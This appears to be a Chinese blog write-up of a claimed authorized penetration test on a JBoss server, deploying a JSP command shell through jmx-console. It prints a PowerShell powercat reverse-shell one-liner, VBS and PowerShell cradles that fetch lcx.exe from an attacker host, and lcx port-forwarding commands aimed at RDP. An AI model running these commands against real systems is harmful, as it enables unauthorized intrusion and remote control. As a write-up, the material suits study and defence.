一次不完美的Jboss渗透

一.前言
最近做渗透测试中遇到一个jboss的站,在其中学到一些在乙方工作挺有用的技巧(这次测试是进过授权测试)在次分享一下
二.信息收集 先通过namp进行扫描,同时进行目录扫描,发现8080/jmx-console/,发现是jboss的站,百度到jboss可以部署war包getshell,访问http://xxxx:8080//jmx-console/
三.漏洞利用 全局搜索jboss.system,点击进入
1.制作war包把木马文件gg.jsp(我是一个直接执行命令代码)用压缩软件压缩为zip,然后更改后缀为war,然后将该war上传到互联网上能够访问的网
站上 //gg.jsp 我这里就用python 简单创建个ftp服务(这也是python的一个巧用) python -m simplehttpserver 8589
2.进入jboss.system页面找到如下,填入远程的war文件地址
成功部署的界面如下
3.访问shell地址,并执行命令
四.进一步渗透 1.在获得php shell的基础上,我们需要一个真正的cmd shell,这样有利于操作,进过nmap扫描,发现是windows,我们可以通过powershell进行shell反弹 powershell iex (new-object system.net.webclient).downloadstring('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p port -e cmd
本地监听,成功获取一个cmd shell,接下来就是提权了
2.在cmd 中查看端口开放信息,3389和445都开放了 想到了永恒之蓝打一波,先看看打没打永恒之蓝的补丁,和看看系统信息,发现打了很多补丁
可以通过如下链接查看补丁编号 网址:https://micro8.gitbook.io/micro8/contents-1/1-10/1windows-ti-quan-kuai-su-cha-zhao-exp 查找永恒之蓝补丁编号进行比对发现该目标机器并没打补丁
3.看端口扫描结果,3389过滤了,445也过滤了,只有端口转发再打了
4.先在shell中查看有那些任务,看看有没杀毒软件,初看没有,但后来才发现了,居然有卡巴斯基
5.没事就到处浏览目录查看内容(发现google账号密码居然记录在txt文件中),发现任何目录都能浏览和看信息,就怀疑这个用户的权限,赶紧看了哈…居然是administrator 组的,那提权就不用了涩,但还是想3389连进去
6.打算用vbs下载一个lcx或者earthworm进行端口转发,vbs下载代码,一般下载在c:windowstemp目录下,可读可写vbs下载代码 echo set post = createobject(msxml2.xmlhttp) >>download.vbs echo set shell = createobject(wscript.shell) >>download.vbs echo post.open get,http://ip/lcxx/lcx.exe,0 >>download.vbs echo post.send() >>download.vbs echo set aget = createobject(adodb.stream) >>download.vbs echo aget.mode = 3 >>download.vbs echo aget.type = 1 >>download.vbs echo aget.open() >>download.vbs echo aget.write(post.responsebody) >>download.vbs echo aget.savetofile c:windowstemp2.txt,2 >>download.vbspowershell 下载代码 powershell (new-object system.net.webclient).downloadfile( 'http://ip:7667/lcxx/lcx.exe','c:windowstemp2.txt')7.当自己写进去了后,更名为exe执行的时候,被杀了,最后又看了下任务,才发现卡巴斯基,然后就一直被卡在这里8.lcx命令如下lcx 命令 //被攻击机器 lcx -slave 自己外网ip 51 内网ip 3389 //攻击机器 lcx.exe -listen 51 9090由于防火墙限制,部分端口如3389无法通过防火墙,此时可以将该目标主机的3389端口透传到防火墙允许的其他端口,如53端口. lcx -tran 53 目标主机ip 3389 总结 虽然暂时没有成功,但从中还是学到许多渗透知识,也明白了实战能提高许多技术。不足就是知识不够,还需努力。


三分钟教你如何选择LED车灯
解读ZigBee射频芯片CC2430应用电路设计
Windows 8和Windows RT区别在哪里?
英飞凌:GaN功率元件前景虽好,但采用为时尚早
华为nova5曝光 后置竖排三摄并采用屏幕指纹
一次不完美的Jboss渗透
现在的AIOT场景能否让芯片领域有所改变
夏普公布可折叠手机原型机 官方号称30万次对折无压力
我国半导体技术创新应用形势研究分析
R&S ZVL3-75多功能仪器可实现高精度S参数测试
物联网时代下的pc对自动化有什么帮助
数字资产中心化交易所和去中心化交易所区别,深圳币币交易所开发
全球晶圆代工龙头台积电又一名员工确诊!
系统集成项目管理工程师考试技巧
用于高精度运动控制的微控制器
21世纪的第三个十年,IT人需要掌握什么技术?
怎么对桁架机器人进行保养?
云原生边缘计算平台 KubeEdge 架构设计
dfrobot5.5" 1920x1080 mini电容式触摸屏简介
德州仪器(TI)放大器技术创新发展最新趋势的观点